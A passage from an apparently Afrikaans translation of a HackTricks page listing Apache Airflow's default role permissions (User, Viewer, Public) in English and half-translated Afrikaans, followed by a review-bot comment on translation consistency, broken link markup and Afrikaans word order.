\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs]
- **User**
\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
\[kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances]
- **Viewer**
\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
\[kan lees op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}
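Review bot: the Default Permissions lists translate the action half of each permission (`kan verwyder op Connections`, `kan lees op DAGs`, `menu toegang op Browse`) while leaving the resource half in English. These strings are the literal permission names Airflow shows in its roles view (the list itself contains `menu access on Security` and `menu access on List Roles`) and are what an operator searches for when auditing a role, so translating half of each makes the list impossible to match against a real instance; keep the bracketed lists verbatim in English, as the resource names already are. Also, `(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]` is broken link markup inherited from the English line (the backslash escapes the bracket and there is no parenthesised URL), so it renders as literal text; `[From the docs](https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html)` would fix it in both versions. Lastly, `Let daarop dat admin gebruikers kan meer rolle skep` keeps English verb order; Afrikaans puts the verb cluster at the end of the subordinate clause: `dat admin gebruikers meer rolle met fyner toestemmings kan skep`.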